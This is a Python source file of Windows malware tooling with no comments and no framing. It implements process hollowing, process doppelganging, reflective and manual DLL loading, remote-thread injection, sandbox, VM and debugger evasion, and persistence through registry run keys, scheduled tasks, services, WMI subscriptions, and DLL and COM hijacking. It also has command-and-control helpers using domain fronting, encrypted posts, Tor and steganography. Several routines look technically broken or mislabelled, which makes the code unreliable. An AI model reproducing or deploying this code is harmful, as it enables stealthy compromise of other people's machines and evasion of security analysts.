#!/usr/bin/env python3 import ctypes import sys import time import random import hashlib import os import threading import struct class ProcessHollowing: def __init__(self): self.kernel32 = ctypes.windll.kernel32 self.ntdll = ctypes.windll.ntdll def create_suspended_process(self, target_path): startup_info = ctypes.wintypes.STARTUPINFOW() process_info = ctypes.wintypes.PROCESS_INFORMATION() startup_info.cb = ctypes.sizeof(startup_info) success = self.kernel32.CreateProcessW( None, target_path, None, None, False, 0x4, None, None, ctypes.byref(startup_info), ctypes.byref(process_info) ) if success: return process_info.hProcess, process_info.hThread, process_info.dwProcessId return None, None, None def unmap_original_image(self, process_handle): peb_address = ctypes.c_void_p() status = self.ntdll.NtQueryInformationProcess( process_handle, 0, ctypes.byref(peb_address), ctypes.sizeof(peb_address), None ) if status == 0: image_base = ctypes.c_void_p() bytes_read = ctypes.wintypes.DWORD() self.kernel32.ReadProcessMemory( process_handle, peb_address.value + 0x10, ctypes.byref(image_base), ctypes.sizeof(image_base), ctypes.byref(bytes_read) ) if image_base.value: status = self.ntdll.NtUnmapViewOfSection( process_handle, image_base ) return status == 0 return False def inject_payload(self, process_handle, payload, entry_point): payload_size = len(payload) allocated_memory = self.kernel32.VirtualAllocEx( process_handle, None, payload_size, 0x3000, 0x40 ) if allocated_memory: written = ctypes.wintypes.DWORD() success = self.kernel32.WriteProcessMemory( process_handle, allocated_memory, payload, payload_size, ctypes.byref(written) ) if success and written.value == payload_size: return allocated_memory return None def resume_execution(self, thread_handle, new_entry_point): context = ctypes.wintypes.CONTEXT() context.ContextFlags = 0x10001 success = self.kernel32.GetThreadContext(thread_handle, ctypes.byref(context)) if success: if sys.maxsize > 2**32: context.Rcx = new_entry_point else: context.Eax = new_entry_point self.kernel32.SetThreadContext(thread_handle, ctypes.byref(context)) self.kernel32.ResumeThread(thread_handle) return True return False def execute_advanced_injection(self, target_path, payload, architecture="x64"): try: process_handle, thread_handle, pid = self.create_suspended_process(target_path) if not process_handle: return False if not self.unmap_original_image(process_handle): self.kernel32.CloseHandle(process_handle) self.kernel32.CloseHandle(thread_handle) return False entry_point = self.inject_payload(process_handle, payload, 0x400000) if not entry_point: self.kernel32.CloseHandle(process_handle) self.kernel32.CloseHandle(thread_handle) return False success = self.resume_execution(thread_handle, entry_point) self.kernel32.CloseHandle(process_handle) self.kernel32.CloseHandle(thread_handle) return success except: return False class AdvancedEvasion: def __init__(self): self.kernel32 = ctypes.windll.kernel32 self.ntdll = ctypes.windll.ntdll self.user32 = ctypes.windll.user32 def detect_vm(self): vm_indicators = 0 try: reg_keys = [ r"SYSTEM\CurrentControlSet\Enum\IDE\DiskVMware", r"SYSTEM\CurrentControlSet\Enum\IDE\DiskVBOX", r"SYSTEM\CurrentControlSet\Enum\IDE\CdRomVMware", r"SOFTWARE\VMware, Inc.\VMware Tools", r"SOFTWARE\Oracle\VirtualBox Guest Additions", r"SYSTEM\CurrentControlSet\Services\VBoxService", r"SYSTEM\CurrentControlSet\Services\VBoxSF", r"SYSTEM\CurrentControlSet\Services\VBoxMouse", r"SYSTEM\CurrentControlSet\Services\VBoxGuest" ] import winreg for key_path in reg_keys: try: key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) winreg.CloseKey(key) vm_indicators += 1 except: pass except: pass try: processes = [ "vmtoolsd.exe", "vboxservice.exe", "vboxtray.exe", "vmwaretray.exe", "vmwareuser.exe", "VGAuthService.exe", "vmacthlp.exe", "vmsrvc.exe", "vmusrvc.exe", "prl_cc.exe", "prl_tools.exe", "xenservice.exe", "qemu-ga.exe", "windanr.exe", "vdagent.exe", "vdservice.exe" ] try: import psutil running_processes = [p.name().lower() for p in psutil.process_iter()] for vm_process in processes: if vm_process.lower() in running_processes: vm_indicators += 1 except: pass except: pass try: vm_files = [ r"C:\windows\system32\drivers\vmmouse.sys", r"C:\windows\system32\drivers\vmhgfs.sys", r"C:\windows\system32\drivers\VBoxMouse.sys", r"C:\windows\system32\drivers\VBoxGuest.sys", r"C:\windows\system32\drivers\VBoxSF.sys", r"C:\windows\system32\drivers\VBoxVideo.sys", r"C:\windows\system32\vboxdisp.dll", r"C:\windows\system32\vboxhook.dll", r"C:\windows\system32\vboxmrxnp.dll", r"C:\windows\system32\vboxogl.dll", r"C:\windows\system32\vboxoglarrayspu.dll", r"C:\windows\system32\vboxoglcrutil.dll", r"C:\windows\system32\vboxoglerrorspu.dll", r"C:\windows\system32\vboxoglfeedbackspu.dll", r"C:\windows\system32\vboxoglpackspu.dll", r"C:\windows\system32\vboxoglpassthroughspu.dll" ] for vm_file in vm_files: if os.path.exists(vm_file): vm_indicators += 1 except: pass try: mac_prefixes = ["00:05:69", "00:0C:29", "00:1C:14", "00:50:56", "08:00:27"] import subprocess result = subprocess.run(["getmac"], capture_output=True, text=True) if result.returncode == 0: for prefix in mac_prefixes: if prefix in result.stdout: vm_indicators += 1 except: pass return vm_indicators > 3 def detect_analysis_tools(self): analysis_tools = [ "ollydbg.exe", "x64dbg.exe", "x32dbg.exe", "windbg.exe", "ida.exe", "ida64.exe", "idaq.exe", "idaq64.exe", "idaw.exe", "idaw64.exe", "procmon.exe", "procexp.exe", "procexp64.exe", "wireshark.exe", "fiddler.exe", "regshot.exe", "pestudio.exe", "die.exe", "exeinfope.exe", "peid.exe", "lordpe.exe", "importrec.exe", "reshacker.exe", "resourcehacker.exe", "apimonitor.exe", "apispy32.exe", "detours.exe", "hookapi.exe", "sysinternals.exe", "autoruns.exe", "autorunsc.exe", "tcpview.exe", "portmon.exe", "filemon.exe", "regmon.exe", "diskmon.exe", "vmmap.exe", "rammap.exe", "handle.exe", "listdlls.exe", "strings.exe", "sigcheck.exe", "pslist.exe", "pskill.exe", "psservice.exe", "pssuspend.exe", "psinfo.exe", "logonsessions.exe", "sdelete.exe", "streams.exe", "du.exe", "junction.exe", "pendmoves.exe", "movefile.exe", "pagedfrg.exe", "contig.exe", "sync.exe", "psfile.exe", "psloggedon.exe", "psloglist.exe", "pspasswd.exe", "psshutdown.exe", "psgetsid.exe", "pskill.exe", "psexec.exe", "psping.exe", "pstools.exe", "accesschk.exe", "accessenum.exe", "adexplorer.exe", "adinsight.exe", "adrestore.exe", "bginfo.exe", "cacheset.exe", "clockres.exe", "coreinfo.exe", "ctrl2cap.exe", "desktops.exe", "disk2vhd.exe", "diskext.exe", "diskview.exe", "efsdump.exe", "hex2dec.exe", "livekd.exe", "loadord.exe", "notmyfault.exe", "ntfsinfo.exe", "pagedfrg.exe", "pipelist.exe", "portmon.exe", "procdump.exe", "procfeatures.exe", "psexec.exe", "psfile.exe", "psgetsid.exe", "psinfo.exe", "pskill.exe", "pslist.exe", "psloggedon.exe", "psloglist.exe", "pspasswd.exe", "psping.exe", "psservice.exe", "psshutdown.exe", "pssuspend.exe", "pstools.exe", "ru.exe", "sdelete.exe", "shareenum.exe", "shellrunas.exe", "sigcheck.exe", "streams.exe", "strings.exe", "sync.exe", "tcpvcon.exe", "tcpview.exe", "vmmap.exe", "volumeid.exe", "whois.exe", "winobj.exe", "zoomit.exe", "cheat engine.exe", "ce.exe", "cheatengine.exe", "artmoney.exe", "gameguardian.exe", "speedhack.exe", "tsearch.exe", "memhack.exe", "memoryhacker.exe", "memoryeditor.exe", "hexeditor.exe", "hxd.exe", "010editor.exe", "hexworkshop.exe", "winhex.exe" ] try: import psutil running_processes = [p.name().lower() for p in psutil.process_iter()] for tool in analysis_tools: if tool.lower() in running_processes: return True except: pass try: analysis_windows = [ "OLLYDBG", "WinDbg", "x64dbg", "x32dbg", "IDA", "Hex-Rays", "Process Monitor", "Process Explorer", "Wireshark", "Fiddler", "RegShot", "PEiD", "LordPE", "ImportREC", "Resource Hacker", "API Monitor", "API Spy", "Detours", "Hook API", "Sysinternals", "Autoruns", "TCPView", "PortMon", "FileMon", "RegMon", "DiskMon", "VMMap", "RAMMap", "Handle", "ListDLLs", "Strings", "SigCheck", "PsList", "PSKill", "PSService", "PSSuspend", "PSInfo", "LogonSessions", "SDelete", "Streams", "DU", "Junction", "PendMoves", "MoveFile", "PagedFrg", "Contig", "Sync", "PSFile", "PSLoggedOn", "PSLogList", "PSPasswd", "PSShutdown", "PSGetSid", "PSExec", "PSPing", "PSTools", "AccessChk", "AccessEnum", "ADExplorer", "ADInsight", "ADRestore", "BGInfo", "CacheSet", "ClockRes", "CoreInfo", "Ctrl2Cap", "Desktops", "Disk2vhd", "DiskExt", "DiskView", "EFSDump", "Hex2dec", "LiveKd", "LoadOrd", "NotMyFault", "NTFSInfo", "PagedFrg", "PipeList", "PortMon", "ProcDump", "ProcFeatures", "RU", "ShareEnum", "ShellRunas", "VolumeId", "WhoIs", "WinObj", "ZoomIt", "Cheat Engine", "ArtMoney", "GameGuardian", "SpeedHack", "TSearch", "MemHack", "MemoryHacker", "MemoryEditor", "HexEditor", "HxD", "010 Editor", "Hex Workshop", "WinHex" ] def enum_windows_proc(hwnd, lParam): length = self.user32.GetWindowTextLengthW(hwnd) if length > 0: buffer = ctypes.create_unicode_buffer(length + 1) self.user32.GetWindowTextW(hwnd, buffer, length + 1) window_title = buffer.value for analysis_window in analysis_windows: if analysis_window.lower() in window_title.lower(): return False return True enum_windows_proc_type = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.wintypes.HWND, ctypes.wintypes.LPARAM) enum_windows_proc_ptr = enum_windows_proc_type(enum_windows_proc) result = self.user32.EnumWindows(enum_windows_proc_ptr, 0) if not result: return True except: pass return False def check_mouse_activity(self): initial_pos = ctypes.wintypes.POINT() self.user32.GetCursorPos(ctypes.byref(initial_pos)) time.sleep(3) final_pos = ctypes.wintypes.POINT() self.user32.GetCursorPos(ctypes.byref(final_pos)) distance = ((final_pos.x - initial_pos.x) ** 2 + (final_pos.y - initial_pos.y) ** 2) ** 0.5 return distance > 15 def check_uptime(self): uptime_ms = self.kernel32.GetTickCount64() uptime_minutes = uptime_ms / (1000 * 60) return uptime_minutes > 15 def check_memory_size(self): memory_status = ctypes.wintypes.MEMORYSTATUSEX() memory_status.dwLength = ctypes.sizeof(memory_status) success = self.kernel32.GlobalMemoryStatusEx(ctypes.byref(memory_status)) if success: total_memory_gb = memory_status.ullTotalPhys / (1024 ** 3) return total_memory_gb >= 4 return True def check_cpu_cores(self): system_info = ctypes.wintypes.SYSTEM_INFO() self.kernel32.GetSystemInfo(ctypes.byref(system_info)) return system_info.dwNumberOfProcessors >= 2 def check_disk_size(self): try: free_bytes = ctypes.c_ulonglong() total_bytes = ctypes.c_ulonglong() success = self.kernel32.GetDiskFreeSpaceExW( "C:\\", ctypes.byref(free_bytes), ctypes.byref(total_bytes), None ) if success: total_gb = total_bytes.value / (1024 ** 3) return total_gb >= 80 except: pass return True def check_recent_files(self): try: recent_path = os.path.expanduser("~\\AppData\\Roaming\\Microsoft\\Windows\\Recent") if os.path.exists(recent_path): files = os.listdir(recent_path) return len(files) > 10 except: pass return True def check_installed_programs(self): try: import winreg programs = [] uninstall_key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" ) i = 0 while True: try: subkey_name = winreg.EnumKey(uninstall_key, i) subkey = winreg.OpenKey(uninstall_key, subkey_name) try: display_name, _ = winreg.QueryValueEx(subkey, "DisplayName") programs.append(display_name) except: pass winreg.CloseKey(subkey) i += 1 except: break winreg.CloseKey(uninstall_key) return len(programs) > 20 except: pass return True def timing_evasion(self): start_time = time.time() for i in range(1000000): hash_obj = hashlib.md5() hash_obj.update(str(i).encode()) hash_obj.hexdigest() end_time = time.time() execution_time = end_time - start_time return execution_time < 10.0 def sleep_evasion(self): start_time = time.time() time.sleep(5) end_time = time.time() actual_sleep = end_time - start_time return 4.5 <= actual_sleep <= 5.5 def rdtsc_evasion(self): try: rdtsc_start = self._rdtsc() time.sleep(0.1) rdtsc_end = self._rdtsc() cycles = rdtsc_end - rdtsc_start return cycles > 100000 except: return True def _rdtsc(self): try: high = ctypes.c_uint32() low = ctypes.c_uint32() asm_code = b"\x0F\x31\x89\x45\xFC\x89\x55\xF8" func_type = ctypes.WINFUNCTYPE(None, ctypes.POINTER(ctypes.c_uint32), ctypes.POINTER(ctypes.c_uint32)) func = ctypes.cast(ctypes.c_char_p(asm_code), func_type) func(ctypes.byref(low), ctypes.byref(high)) return (high.value << 32) | low.value except: return int(time.time() * 1000000) def check_debugger_artifacts(self): try: debug_heap = self.kernel32.GetProcessHeap() heap_flags = ctypes.c_uint32.from_address(debug_heap + 0x40) if heap_flags.value & 0x2: return True force_flags = ctypes.c_uint32.from_address(debug_heap + 0x44) if force_flags.value & 0x40000060: return True except: pass try: peb = ctypes.c_void_p.from_address(0x7FFE0000) being_debugged = ctypes.c_ubyte.from_address(peb.value + 0x02) if being_debugged.value: return True except: pass return False def check_hooks(self): try: ntdll = self.kernel32.GetModuleHandleW("ntdll.dll") if not ntdll: return False nt_query_info = self.kernel32.GetProcAddress(ntdll, b"NtQueryInformationProcess") if not nt_query_info: return False first_bytes = ctypes.c_ubyte.from_address(nt_query_info) if first_bytes.value == 0xE9 or first_bytes.value == 0xFF: return True except: pass return False def comprehensive_env_check(self): checks = [ ("VM Detection", self.detect_vm), ("Analysis Tools", self.detect_analysis_tools), ("Mouse Activity", self.check_mouse_activity), ("System Uptime", self.check_uptime), ("Memory Size", self.check_memory_size), ("CPU Cores", self.check_cpu_cores), ("Disk Size", self.check_disk_size), ("Recent Files", self.check_recent_files), ("Installed Programs", self.check_installed_programs), ("Timing Analysis", self.timing_evasion), ("Sleep Analysis", self.sleep_evasion), ("RDTSC Analysis", self.rdtsc_evasion), ("Debugger Artifacts", self.check_debugger_artifacts), ("API Hooks", self.check_hooks) ] suspicious_count = 0 total_checks = len(checks) for check_name, check_func in checks: try: result = check_func() if not result: suspicious_count += 1 except: suspicious_count += 1 suspicion_ratio = suspicious_count / total_checks return suspicion_ratio < 0.3 class PersistenceManager: def __init__(self): self.kernel32 = ctypes.windll.kernel32 self.advapi32 = ctypes.windll.advapi32 def registry_run_key(self, name, path): try: import winreg key = winreg.OpenKey( winreg.HKEY_CURRENT_USER, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_SET_VALUE ) winreg.SetValueEx(key, name, 0, winreg.REG_SZ, path) winreg.CloseKey(key) return True except: return False def scheduled_task(self, task_name, executable_path): try: import subprocess cmd = f'schtasks /create /tn "{task_name}" /tr "{executable_path}" /sc onlogon /f' result = subprocess.run(cmd, shell=True, capture_output=True, text=True) return result.returncode == 0 except: return False def service_persistence(self, service_name, executable_path): try: import subprocess create_cmd = f'sc create "{service_name}" binPath= "{executable_path}" start= auto' start_cmd = f'sc start "{service_name}"' create_result = subprocess.run(create_cmd, shell=True, capture_output=True) if create_result.returncode == 0: start_result = subprocess.run(start_cmd, shell=True, capture_output=True) return start_result.returncode == 0 except: pass return False def wmi_event_subscription(self, consumer_name, filter_name): try: import subprocess filter_cmd = f'wmic /namespace:"\\\\root\\subscription" PATH __EventFilter CREATE Name="{filter_name}", EventNameSpace="root\\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \'Win32_PerfRawData_PerfOS_System\'"' consumer_cmd = f'wmic /namespace:"\\\\root\\subscription" PATH CommandLineEventConsumer CREATE Name="{consumer_name}", ExecutablePath="C:\\\\Windows\\\\System32\\\\calc.exe", CommandLineTemplate="C:\\\\Windows\\\\System32\\\\calc.exe"' binding_cmd = f'wmic /namespace:"\\\\root\\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\\"{filter_name}\\"", Consumer="CommandLineEventConsumer.Name=\\"{consumer_name}\\""' subprocess.run(filter_cmd, shell=True, capture_output=True) subprocess.run(consumer_cmd, shell=True, capture_output=True) result = subprocess.run(binding_cmd, shell=True, capture_output=True) return result.returncode == 0 except: return False def dll_hijacking_setup(self, target_directory, dll_name, payload_path): try: import shutil target_dll_path = os.path.join(target_directory, dll_name) if os.path.exists(payload_path): shutil.copy2(payload_path, target_dll_path) return os.path.exists(target_dll_path) except: pass return False def startup_folder_persistence(self, name, executable_path): try: import shutil startup_folder = os.path.expanduser( "~\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" ) if os.path.exists(startup_folder): target_path = os.path.join(startup_folder, f"{name}.exe") shutil.copy2(executable_path, target_path) return os.path.exists(target_path) except: pass return False def com_hijacking(self, clsid, executable_path): try: import winreg key_path = f"SOFTWARE\\Classes\\CLSID\\{clsid}\\InprocServer32" key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, key_path) winreg.SetValueEx(key, "", 0, winreg.REG_SZ, executable_path) winreg.SetValueEx(key, "ThreadingModel", 0, winreg.REG_SZ, "Apartment") winreg.CloseKey(key) return True except: return False class NetworkEvasion: def __init__(self): self.kernel32 = ctypes.windll.kernel32 def domain_fronting_request(self, fronted_domain, real_domain, path): try: import requests headers = { 'Host': real_domain, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1', 'Cache-Control': 'max-age=0' } url = f"https://{fronted_domain}{path}" response = requests.get(url, headers=headers, timeout=10, verify=False) return response.status_code == 200 except: return False def dns_over_https_lookup(self, domain): try: import requests import json doh_providers = [ "https://1.1.1.1/dns-query", "https://8.8.8.8/dns-query", "https://dns.google/dns-query", "https://cloudflare-dns.com/dns-query" ] for provider in doh_providers: try: doh_url = f"{provider}?name={domain}&type=A" headers = { 'Accept': 'application/dns-json' } response = requests.get(doh_url, headers=headers, timeout=5) if response.status_code == 200: data = response.json() if 'Answer' in data: return [answer['data'] for answer in data['Answer']] except: continue except: pass return [] def encrypted_c2_comm(self, server_url, data, key): try: try: from cryptography.fernet import Fernet import base64 cipher_suite = Fernet(key) encrypted_data = cipher_suite.encrypt(data.encode()) payload = { 'data': base64.b64encode(encrypted_data).decode() } import requests response = requests.post(server_url, json=payload, timeout=10) if response.status_code == 200: try: encrypted_response = base64.b64decode(response.json()['data']) decrypted_response = cipher_suite.decrypt(encrypted_response) return decrypted_response.decode() except: return response.text except ImportError: import requests simple_key = sum(key) % 256 encrypted_data = ''.join(chr(ord(c) ^ simple_key) for c in data) payload = {'data': encrypted_data} response = requests.post(server_url, json=payload, timeout=10) if response.status_code == 200: return response.text except: pass return None def tor_request(self, url, data=None): try: import requests proxies = { 'http': 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' } if data: response = requests.post(url, json=data, proxies=proxies, headers=headers, timeout=30) else: response = requests.get(url, proxies=proxies, headers=headers, timeout=30) return response.text if response.status_code == 200 else None except: return None def steganography_comm(self, image_path, data): try: from PIL import Image import io img = Image.open(image_path) pixels = list(img.getdata()) binary_data = ''.join(format(ord(char), '08b') for char in data) binary_data += '1111111111111110' data_index = 0 new_pixels = [] for pixel in pixels: if data_index < len(binary_data): r, g, b = pixel[:3] if data_index < len(binary_data): r = (r & 0xFE) | int(binary_data[data_index]) data_index += 1 if data_index < len(binary_data): g = (g & 0xFE) | int(binary_data[data_index]) data_index += 1 if data_index < len(binary_data): b = (b & 0xFE) | int(binary_data[data_index]) data_index += 1 new_pixels.append((r, g, b)) else: new_pixels.append(pixel) new_img = Image.new(img.mode, img.size) new_img.putdata(new_pixels) output = io.BytesIO() new_img.save(output, format='PNG') return output.getvalue() except: return None class PayloadDelivery: def __init__(self): self.kernel32 = ctypes.windll.kernel32 self.ntdll = ctypes.windll.ntdll def reflective_dll_loading(self, dll_data): try: dll_size = len(dll_data) allocated_memory = self.kernel32.VirtualAlloc( None, dll_size, 0x3000, 0x40 ) if allocated_memory: ctypes.memmove(allocated_memory, dll_data, dll_size) dos_header = ctypes.cast(allocated_memory, ctypes.POINTER(ctypes.c_uint16)) if dos_header[0] == 0x5A4D: pe_offset = ctypes.cast(allocated_memory + 0x3C, ctypes.POINTER(ctypes.c_uint32))[0] nt_headers = allocated_memory + pe_offset entry_point_rva = ctypes.cast(nt_headers + 0x28, ctypes.POINTER(ctypes.c_uint32))[0] entry_point = allocated_memory + entry_point_rva dll_main = ctypes.cast(entry_point, ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p)) return dll_main(allocated_memory, 1, None) except: pass return False def process_doppelganging(self, legitimate_path, payload_data): try: transaction_handle = ctypes.wintypes.HANDLE() status = self.ntdll.NtCreateTransaction( ctypes.byref(transaction_handle), 0x1F0000, None, None, None, 0, 0, 0, None, None ) if status == 0: transacted_file = self.kernel32.CreateFileTransactedW( legitimate_path, 0x40000000, 0, None, 2, 0, None, transaction_handle, None, None ) if transacted_file != -1: written = ctypes.wintypes.DWORD() success = self.kernel32.WriteFile( transacted_file, payload_data, len(payload_data), ctypes.byref(written), None ) if success: section_handle = ctypes.wintypes.HANDLE() status = self.ntdll.NtCreateSection( ctypes.byref(section_handle), 0x1F0000, None, None, 0x02, 0x1000000, transacted_file ) if status == 0: process_info = ctypes.wintypes.PROCESS_INFORMATION() status = self.ntdll.NtCreateProcessEx( ctypes.byref(process_info.hProcess), 0x1F0FFF, None, self.kernel32.GetCurrentProcess(), 4, section_handle, None, None, False ) if status == 0: self.kernel32.CloseHandle(section_handle) self.kernel32.CloseHandle(transacted_file) self.ntdll.NtRollbackTransaction(transaction_handle, True) self.kernel32.CloseHandle(transaction_handle) return True self.kernel32.CloseHandle(transacted_file) self.ntdll.NtRollbackTransaction(transaction_handle, True) self.kernel32.CloseHandle(transaction_handle) except: pass return False def atom_bombing(self, target_pid, payload): try: process_handle = self.kernel32.OpenProcess( 0x1F0FFF, False, target_pid ) if process_handle: atom_name = f"AtomBomb{random.randint(1000, 9999)}" atom = self.kernel32.GlobalAddAtomW(atom_name) if atom: allocated_memory = self.kernel32.VirtualAllocEx( process_handle, None, len(payload), 0x3000, 0x40 ) if allocated_memory: written = ctypes.wintypes.DWORD() success = self.kernel32.WriteProcessMemory( process_handle, allocated_memory, payload, len(payload), ctypes.byref(written) ) if success: thread_handle = self.kernel32.CreateRemoteThread( process_handle, None, 0, allocated_memory, None, 0, None ) if thread_handle: self.kernel32.CloseHandle(thread_handle) self.kernel32.CloseHandle(process_handle) self.kernel32.GlobalDeleteAtom(atom) return True self.kernel32.GlobalDeleteAtom(atom) self.kernel32.CloseHandle(process_handle) except: pass return False def manual_dll_mapping(self, target_pid, dll_data): try: process_handle = self.kernel32.OpenProcess( 0x1F0FFF, False, target_pid ) if process_handle: dos_header = ctypes.cast(dll_data, ctypes.POINTER(ctypes.c_uint16)) if dos_header[0] == 0x5A4D: pe_offset = ctypes.cast(ctypes.addressof(dll_data) + 0x3C, ctypes.POINTER(ctypes.c_uint32))[0] nt_headers = ctypes.addressof(dll_data) + pe_offset image_size = ctypes.cast(nt_headers + 0x50, ctypes.POINTER(ctypes.c_uint32))[0] allocated_memory = self.kernel32.VirtualAllocEx( process_handle, None, image_size, 0x3000, 0x40 ) if allocated_memory: written = ctypes.wintypes.DWORD() success = self.kernel32.WriteProcessMemory( process_handle, allocated_memory, dll_data, len(dll_data), ctypes.byref(written) ) if success: self.kernel32.CloseHandle(process_handle) return True self.kernel32.CloseHandle(process_handle) except: pass return False